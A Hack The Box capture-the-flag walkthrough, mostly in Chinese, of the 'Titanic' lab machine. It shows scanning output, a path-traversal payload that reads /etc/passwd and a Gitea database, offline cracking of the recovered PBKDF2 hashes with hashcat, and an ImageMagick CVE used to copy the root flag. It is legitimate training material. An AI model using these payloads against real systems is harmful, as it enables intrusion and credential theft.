HTB_Titanic

TelBo_on published on
3 min, 586 words

Categories: OSCP

Tags: Linux LFI

user

recon

ports information
 sudo nmap -sS -sC -sV -p22,80 titanic.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-17 20:54 +08
Nmap scan report for titanic.htb (10.129.193.2)
Host is up (0.10s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Titanic - Book Your Ship Trip
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/3.0.3 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds

目标开放端口22,80。80端口存在一个flask WEB框架的web应用系统。 页面无可进一步利用的功能点,进行目录扫描,未发现有敏感文件泄露,但是存在一个/download和 /book子目录。

dirsearch -u http://titanic.htb/                                                   
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kalier/Hackthebox/Titanic/reports/http_titanic.htb/__25-02-17_20-57-47.txt

Target: http://titanic.htb/

[20:57:47] Starting: 
[20:58:59] 405 -  153B  - /book                                             
[20:59:16] 400 -   41B  - /download                                         
[21:00:09] 403 -  276B  - /server-status                                    
[21:00:09] 403 -  276B  - /server-status/

进行子域名爆破,发现存在一个子域名dev.titanic.htb。

gobuster vhost -u http://titanic.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -r 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://titanic.htb/
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.titanic.htb Status: 200 [Size: 13982]

访问存在一个私有gitea服务,我们尝试注册登录。发现存在developer且有两个子项目gitea和mysql。在子项目gitea中发现了端口80开放web服务的源代码。浏览一遍,发现了download子界面可能存在LFI漏洞,构造payload:/../../../../../etc/passwd尝试,获得了/etc/passwd文件。证实存在漏洞。直接读取user.txt文件。

First Foot

在子项目gitea中的docker-compose.yml文件里发现了gitea项目的绝对路径: /home/developer/gitea/data。我们可以尝试利用LFI读取Gitea的数据库,获取其中的密码hash进行离线破解。这里我们可以寻找相关路径信息或者直接尝试猜测数据库路径。最终得到了数据库的绝对路径:/home/developer/gitea/data/gitea/gitea.db。下载后发现数据库中user表的hash是被加密混淆的。在github上寻找解密脚本:I Get this。在Gitea的app.ini配置中我发现了此数据库使用的是PBKDF2加密算法,对应的hashcat id是10900。将脚本转换的内容直接原样保存为一个txt文件,进行爆破。我的命令展示是如下:

hashcat -m 10900 -a 0  ./hashes.txt /usr/share/wordlists/rockyou.txt --force --user       
hashcat (v6.2.6) starting

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

INFO: All hashes found as potfile and/or empty entries! Use --show to display them.

Started: Mon Feb 17 21:34:10 2025
Stopped: Mon Feb 17 21:34:11 2025

获得了developer的ssh凭据。

Root

使用linpeas对目标信息进行枚举。发现存在一个脚本文件:

developer@titanic:/opt/scripts$ ls
identify_images.sh

developer@titanic:/opt/scripts$ cat identify_images.sh 
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

该脚本大概作用是:

  1. 进入 /opt/app/static/assets/images 目录。 ``

  2. 清空 metadata.log 文件的内容。

  3. 查找 /opt/app/static/assets/images/ 目录及其子目录中的所有 .jpg 文件。

  4. 使用 ImageMagick 的 identify 工具获取这些图片的元数据。

  5. 将这些元数据追加到 metadata.log 文件中。 使用了magick工具,我们看看它的版本信息,搜索是否存在cve。确实存在

Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (9.4)

按照poc进行复现,将命令改为:cp /root/root.txt /tmp/root.txt;chmod 777 /tmp/root.txt。

Summary

暂时没啥好总结的。